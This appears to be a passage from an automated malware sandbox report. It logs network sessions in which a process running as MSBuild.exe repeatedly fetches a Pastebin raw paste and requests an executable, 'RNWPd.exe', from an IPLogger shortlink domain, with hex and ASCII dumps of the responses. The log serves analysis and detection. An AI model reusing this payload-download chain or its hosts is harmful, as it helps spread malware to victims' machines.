                    Data Ascii: osition='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:21:25 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    17192.168.2.649745104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:21:30 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:21:30 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:21:30 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c43384ebf7a430f-EWR
                    2024-09-16 19:21:30 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                    2024-09-16 19:21:30 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:21:30 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                    2024-09-16 19:21:30 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:21:30 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    18192.168.2.649746188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:21:31 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:21:32 UTC904INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:21:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.36197662353515625
                    expires: Mon, 16 Sep 2024 19:21:31 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:21:31 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=47DdMPAiOf%2FF8jtgKK0FEp1CkO1fSDD2ycLyZ1Te7dz3z%2FcHRdIuThsDP%2BNA%2F9ZTYXMWT%2B8UAfyh6nxjwraWBdLeEiVjJhWhgK1EjSHZ2PQm3a9y5MMqhZI%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c4338560b92434c-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:21:32 UTC465INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                    2024-09-16 19:21:32 UTC1369INData Raw: 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f
                    Data Ascii: t-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta pro
                    2024-09-16 19:21:32 UTC1369INData Raw: 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65
                    Data Ascii: und-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-de
                    2024-09-16 19:21:32 UTC1369INData Raw: 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e
                    Data Ascii: .userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(n
                    2024-09-16 19:21:32 UTC1369INData Raw: 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72
                    Data Ascii: ><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;bor
                    2024-09-16 19:21:32 UTC1369INData Raw: 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20
                    Data Ascii: 31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div
                    2024-09-16 19:21:32 UTC160INData Raw: 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: .style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:21:32 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    19192.168.2.649747104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:21:36 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:21:37 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:21:37 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c433876ac16c34e-EWR
                    2024-09-16 19:21:37 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                    2024-09-16 19:21:37 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:21:37 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                    2024-09-16 19:21:37 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:21:37 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    20192.168.2.649748188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:21:38 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:21:38 UTC898INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:21:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.36197662353515625
                    expires: Mon, 16 Sep 2024 19:21:38 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:21:38 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0y1ohS%2FFJgg4m098TfIgtWFsDEebq6hdi63Ugt3ElDjM9QlJyC6ojG7ezlaqZW3oxta6oX5HEv72gPa8wkTB4ziecLppwzDf3l0vgEP8Mq1gZsHLiNdds%2Fc%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c43387efd1a0cbc-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:21:38 UTC471INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                    2024-09-16 19:21:38 UTC1369INData Raw: 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d
                    Data Ascii: r" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property=
